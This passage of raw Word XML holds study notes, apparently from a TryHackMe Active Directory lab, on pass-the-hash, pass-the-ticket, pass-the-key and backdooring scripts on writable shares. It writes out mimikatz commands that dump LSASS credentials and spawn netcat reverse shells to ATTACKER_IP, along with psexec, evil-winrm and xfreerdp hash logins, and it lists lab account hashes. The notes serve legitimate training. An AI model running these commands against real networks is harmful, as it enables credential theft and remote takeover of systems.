      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">         * Domain   : ZA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F51B5B8" w14:textId="6D97E46A" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">         * NTLM     : 6b4a57f67805a663c818106dc0648484</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52636DBF" w14:textId="19293066" w:rsidR="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:r w:rsidRPr="004D0DED">
        <w:t>use the extracted hashes to perform a PtH attack by using mimikatz to inject an access token for the victim user on a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A0AE03" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:t>mimikatz # token::revert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20407B70" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRPr="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004D0DED">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="004D0DED">
        <w:t>mimikatz # sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3977E25F" w14:textId="07D16F6F" w:rsidR="0079383F" w:rsidRDefault="0079383F" w:rsidP="0079383F">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0079383F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>token::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0079383F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>revert</w:t>
      </w:r>
      <w:r w:rsidRPr="0079383F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> command is used to revert any impersonation or privilege escalation that has been applied, returning the current thread's security context to its original state. This is particularly important after commands like </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0079383F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>token::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0079383F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>elevate</w:t>
      </w:r>
      <w:r w:rsidRPr="0079383F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, which impersonate higher-privileged tokens such as SYSTEM. By executing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0079383F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>token::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0079383F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>revert, you ensure that subsequent operations are performed under the original user's security context, preventing unintended privilege usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18198FA0" w14:textId="7885A0D4" w:rsidR="004D0DED" w:rsidRPr="00125E27" w:rsidRDefault="00125E27" w:rsidP="00125E27">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125E27">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Interestingly, if you run the whoami command on this shell, it will still show you the original user you were using before doing PtH, but any command run from here will </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00125E27">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>actually use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00125E27">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the credentials we injected using PtH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0505BB49" w14:textId="787C0274" w:rsidR="004A2315" w:rsidRDefault="004A2315" w:rsidP="004A2315">
      <w:r w:rsidRPr="004A2315">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passing the Hash Using Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F49CA7" w14:textId="77777777" w:rsidR="004A2315" w:rsidRPr="004A2315" w:rsidRDefault="004A2315" w:rsidP="004A2315">
      <w:r w:rsidRPr="004A2315">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Connect to RDP using PtH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2A6FBC" w14:textId="77777777" w:rsidR="004A2315" w:rsidRPr="004A2315" w:rsidRDefault="004A2315" w:rsidP="004A2315">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="004A2315">
        <w:t>xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160D5A90" w14:textId="77777777" w:rsidR="004A2315" w:rsidRPr="004A2315" w:rsidRDefault="004A2315" w:rsidP="004A2315">
      <w:r w:rsidRPr="004A2315">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Connect via psexec using PtH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195802EF" w14:textId="77777777" w:rsidR="004A2315" w:rsidRPr="004A2315" w:rsidRDefault="004A2315" w:rsidP="004A2315">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="004A2315">
        <w:t>psexec.py -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60753C46" w14:textId="77777777" w:rsidR="004A2315" w:rsidRPr="004A2315" w:rsidRDefault="004A2315" w:rsidP="004A2315">
      <w:r w:rsidRPr="004A2315">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2315">
        <w:t> Only the linux version of psexec support PtH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C964524" w14:textId="77777777" w:rsidR="004A2315" w:rsidRPr="004A2315" w:rsidRDefault="004A2315" w:rsidP="004A2315">
      <w:r w:rsidRPr="004A2315">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Connect to WinRM using PtH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE72548" w14:textId="77777777" w:rsidR="004A2315" w:rsidRPr="004A2315" w:rsidRDefault="004A2315" w:rsidP="004A2315">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="004A2315">
        <w:t>evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6804EB71" w14:textId="77777777" w:rsidR="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="004668D1"/>
    <w:p w14:paraId="7AAE5A10" w14:textId="77777777" w:rsidR="004A2315" w:rsidRPr="004A2315" w:rsidRDefault="004A2315" w:rsidP="00990322">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="004A2315">
        <w:t>Kerberos Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8C0881" w14:textId="77777777" w:rsidR="00125E27" w:rsidRPr="00125E27" w:rsidRDefault="00125E27" w:rsidP="00125E27">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125E27">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pass-the-Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532F2264" w14:textId="795B45DF" w:rsidR="00125E27" w:rsidRPr="00125E27" w:rsidRDefault="00125E27" w:rsidP="00125E27">
      <w:r w:rsidRPr="00125E27">
        <w:t xml:space="preserve">Sometimes it will be possible to extract Kerberos tickets </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00125E27">
        <w:t>TGT or TGS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00125E27">
        <w:t>and session keys from LSASS memory using mimikatz. The process usually requires us to have SYSTEM privileges on the attacked machine and can be done as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524734F6" w14:textId="77777777" w:rsidR="00125E27" w:rsidRPr="00125E27" w:rsidRDefault="00125E27" w:rsidP="00125E27">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00125E27">
        <w:t>mimikatz # privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C7AB05" w14:textId="77777777" w:rsidR="00125E27" w:rsidRPr="00125E27" w:rsidRDefault="00125E27" w:rsidP="00125E27">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="00125E27">
        <w:t>mimikatz # sekurlsa::tickets /export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6BD2BA" w14:textId="5ED215B2" w:rsidR="0079383F" w:rsidRDefault="00125E27" w:rsidP="0079383F">
      <w:r w:rsidRPr="00A7567E">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Extracting TGTs will require us to have administrator's credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="00125E27">
        <w:t>, and extracting TGSs can be done with a low-privileged account (only the ones assigned to that account).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B69D3" w14:textId="3EBB3C71" w:rsidR="0079383F" w:rsidRDefault="0079383F" w:rsidP="0079383F">
      <w:r w:rsidRPr="0079383F">
        <w:t xml:space="preserve">inject the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">extracted </w:t>
      </w:r>
      <w:r w:rsidRPr="0079383F">
        <w:t>tickets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>(.kiribi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0079383F">
        <w:t xml:space="preserve"> into the current session</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0079383F">
        <w:t xml:space="preserve"> doesn't require administrator privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3221F717" w14:textId="22BFD1D5" w:rsidR="00A7567E" w:rsidRDefault="00A7567E" w:rsidP="00A7567E">
      <w:r w:rsidRPr="00A7567E">
        <w:t xml:space="preserve">ticket </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7567E">
        <w:t xml:space="preserve"> its corresponding session key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> both are necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABA575A" w14:textId="00C7945B" w:rsidR="004D0DED" w:rsidRDefault="004D0DED" w:rsidP="0079383F"/>
    <w:p w14:paraId="469A1E71" w14:textId="77777777" w:rsidR="0079383F" w:rsidRPr="0079383F" w:rsidRDefault="0079383F" w:rsidP="0079383F">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="0079383F">
        <w:t>mimikatz # kerberos::ptt [0;427fcd5]-2-0-40e10000-Administrator@krbtgt-ZA.TRYHACKME.COM.kirbi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D1E6BB" w14:textId="77777777" w:rsidR="0079383F" w:rsidRDefault="0079383F" w:rsidP="0079383F"/>
    <w:p w14:paraId="2EF9A37A" w14:textId="617BDCC9" w:rsidR="0079383F" w:rsidRDefault="0079383F" w:rsidP="0079383F">
      <w:r w:rsidRPr="0079383F">
        <w:t>To check if the tickets were correctly injected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D756C33" w14:textId="61927415" w:rsidR="00FC72AB" w:rsidRDefault="0079383F" w:rsidP="0079383F">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="0079383F">
        <w:t>za\bob.jenkins@THMJMP2 C:\&gt; klist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F149F0" w14:textId="77777777" w:rsidR="0079383F" w:rsidRDefault="0079383F" w:rsidP="0079383F"/>
    <w:p w14:paraId="76B3AD91" w14:textId="720737B7" w:rsidR="0079383F" w:rsidRPr="0079383F" w:rsidRDefault="0079383F" w:rsidP="0079383F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0079383F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Overpass-the-hash / Pass-the-Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66168F28" w14:textId="136A3AAA" w:rsidR="0079383F" w:rsidRPr="0079383F" w:rsidRDefault="0079383F" w:rsidP="0079383F">
      <w:r w:rsidRPr="0079383F">
        <w:t xml:space="preserve">This kind of attack is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0079383F">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0079383F">
        <w:t xml:space="preserve"> PtH but applied to Kerberos networks</w:t>
      </w:r>
      <w:r w:rsidR="008A652E">
        <w:t xml:space="preserve"> instead NTLM</w:t>
      </w:r>
      <w:r w:rsidRPr="0079383F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209C00E1" w14:textId="5A30F37F" w:rsidR="0079383F" w:rsidRDefault="001266E4" w:rsidP="001266E4">
      <w:r w:rsidRPr="001266E4">
        <w:t xml:space="preserve">When a user requests a TGT, they send a timestamp encrypted with an encryption key derived from their password. The algorithm used to derive this key can be either DES (disabled by default on current Windows versions), RC4, AES128 or AES256, depending on the installed Windows version and Kerberos configuration. If we have any of </w:t>
      </w:r>
      <w:r w:rsidRPr="001266E4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">those keys, we can ask </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001266E4">
        <w:t>the KDC</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001266E4">
        <w:t xml:space="preserve"> for a TGT without requiring the actual password, hence the name </w:t>
      </w:r>
      <w:r w:rsidRPr="001266E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pass-the-key (PtK)</w:t>
      </w:r>
      <w:r w:rsidRPr="001266E4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBF00F9" w14:textId="77777777" w:rsidR="001266E4" w:rsidRDefault="001266E4" w:rsidP="001266E4"/>
    <w:p w14:paraId="47AB8E5D" w14:textId="782E92B4" w:rsidR="001266E4" w:rsidRDefault="001266E4" w:rsidP="001266E4">
      <w:r>
        <w:t>Extract</w:t>
      </w:r>
      <w:r w:rsidRPr="001266E4">
        <w:t> Kerberos encryption keys from memory by using mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205541BB" w14:textId="77777777" w:rsidR="001266E4" w:rsidRPr="001266E4" w:rsidRDefault="001266E4" w:rsidP="001266E4">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="001266E4">
        <w:t>mimikatz # privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C75451" w14:textId="77777777" w:rsidR="001266E4" w:rsidRPr="001266E4" w:rsidRDefault="001266E4" w:rsidP="001266E4">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="001266E4">
        <w:t>mimikatz # sekurlsa::ekeys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1B378A" w14:textId="77777777" w:rsidR="001266E4" w:rsidRDefault="001266E4" w:rsidP="001266E4"/>
    <w:p w14:paraId="3ED38385" w14:textId="782AAF0A" w:rsidR="001266E4" w:rsidRPr="001266E4" w:rsidRDefault="001266E4" w:rsidP="001266E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001266E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mimikatz to get a reverse shell via Pass-the-Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEBE279" w14:textId="77777777" w:rsidR="001266E4" w:rsidRPr="001266E4" w:rsidRDefault="001266E4" w:rsidP="001266E4">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="001266E4">
        <w:t>/user:Administrator /domain:za.tryhackme.com /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605C3677" w14:textId="77777777" w:rsidR="001266E4" w:rsidRPr="001266E4" w:rsidRDefault="001266E4" w:rsidP="001266E4">
      <w:r w:rsidRPr="001266E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>If we have the AES128 hash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA24C65" w14:textId="77777777" w:rsidR="001266E4" w:rsidRPr="001266E4" w:rsidRDefault="001266E4" w:rsidP="001266E4">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="001266E4">
        <w:t>mimikatz # sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /aes128:b65ea8151f13a31d01377f5934bf3883 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09599E61" w14:textId="77777777" w:rsidR="001266E4" w:rsidRPr="001266E4" w:rsidRDefault="001266E4" w:rsidP="001266E4">
      <w:r w:rsidRPr="001266E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>If we have the AES256 hash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1DA0FD" w14:textId="7FF8EDB6" w:rsidR="001266E4" w:rsidRPr="001266E4" w:rsidRDefault="001266E4" w:rsidP="00C30A0B">
      <w:pPr>
        <w:pStyle w:val="code2"/>
      </w:pPr>
      <w:r w:rsidRPr="001266E4">
        <w:t xml:space="preserve">mimikatz # </w:t>
      </w:r>
      <w:r w:rsidR="00C30A0B" w:rsidRPr="00C30A0B">
        <w:t>sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /aes256:b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B5FB20" w14:textId="77777777" w:rsidR="001266E4" w:rsidRDefault="001266E4" w:rsidP="001266E4">
      <w:r w:rsidRPr="001266E4">
        <w:t>Notice that when using RC4, the key will be equal to the NTLM hash of a user. This means that if we could extract the NTLM hash, we can use it to request a TGT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001266E4">
        <w:t>as long as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001266E4">
        <w:t xml:space="preserve"> RC4 is one of the enabled protocols. This </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001266E4">
        <w:t>particular variant</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001266E4">
        <w:t xml:space="preserve"> is usually known as </w:t>
      </w:r>
      <w:r w:rsidRPr="001266E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Overpass-the-Hash (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001266E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OPtH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001266E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="001266E4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B17C812" w14:textId="77777777" w:rsidR="001266E4" w:rsidRDefault="001266E4" w:rsidP="001266E4"/>
    <w:p w14:paraId="0E82A2C1" w14:textId="738579BC" w:rsidR="00935278" w:rsidRDefault="00935278" w:rsidP="00931A5C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00931A5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing User </w:t>
      </w:r>
      <w:r w:rsidR="008A652E" w:rsidRPr="00931A5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFB4FC1" w14:textId="26115779" w:rsidR="008A652E" w:rsidRPr="00990322" w:rsidRDefault="00990322" w:rsidP="00990322">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Abusing Writable Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1431EE98" w14:textId="5A9AE7B4" w:rsidR="008A652E" w:rsidRDefault="00873238" w:rsidP="008A652E">
      <w:r w:rsidRPr="00873238">
        <w:t>It is common to find network shares that legitimate users use to perform day-to-day tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B5976D" w14:textId="29A35F99" w:rsidR="00873238" w:rsidRDefault="00873238" w:rsidP="00873238">
      <w:r w:rsidRPr="00873238">
        <w:t>administrator</w:t>
      </w:r>
      <w:r w:rsidR="00990322">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00873238">
        <w:t xml:space="preserve"> can maintain an executable on a network share, and users can execute it without copying or installing the application to each user's machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC8BA39" w14:textId="77777777" w:rsidR="00873238" w:rsidRDefault="00873238" w:rsidP="00873238">
      <w:r w:rsidRPr="00873238">
        <w:t>Although the script or executable is hosted on a server, when a user opens the shortcut on his workstation, the executable will be copied from the server to its </w:t>
      </w:r>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%temp%</w:t>
      </w:r>
      <w:r w:rsidRPr="00873238">
        <w:t> folder and executed on the workstation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19305C36" w14:textId="469DB2EC" w:rsidR="00873238" w:rsidRDefault="00873238" w:rsidP="00873238">
      <w:r w:rsidRPr="00873238">
        <w:lastRenderedPageBreak/>
        <w:t>If we, as attackers</w:t>
      </w:r>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, have </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00873238">
        <w:t xml:space="preserve"> over such scripts or executables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (have </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> permission on this share)</w:t>
      </w:r>
      <w:r w:rsidRPr="00873238">
        <w:t xml:space="preserve">, we can </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">insert a </w:t>
      </w:r>
      <w:r w:rsidRPr="00873238">
        <w:t xml:space="preserve">backdoor </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>this executables</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00873238">
        <w:t>to force users to execute any payload we want.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C38DCC" w14:textId="77777777" w:rsidR="00873238" w:rsidRDefault="00873238" w:rsidP="00873238"/>
    <w:p w14:paraId="6533F158" w14:textId="77777777" w:rsidR="00873238" w:rsidRPr="00990322" w:rsidRDefault="00873238" w:rsidP="00990322">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backdooring .vbs Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68228872" w14:textId="77FDCBE3" w:rsidR="00873238" w:rsidRDefault="006C7024" w:rsidP="00740D80">
      <w:r w:rsidRPr="006C7024">
        <w:t xml:space="preserve">if the shared </w:t>
      </w:r>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>resource is a VBS script</w:t>
      </w:r>
      <w:r w:rsidR="00740D80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (.vbs </w:t>
      </w:r>
      <w:r w:rsidR="00740D80" w:rsidRPr="00740D80">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Visual </w:t>
      </w:r>
      <w:r w:rsidR="00740D80">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00740D80" w:rsidRPr="00740D80">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Basic Script</w:t>
      </w:r>
      <w:r w:rsidR="00740D80" w:rsidRPr="007D35B6">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00740D80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C7024">
        <w:t xml:space="preserve">, we can put a copy of </w:t>
      </w:r>
      <w:r w:rsidRPr="00990322">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
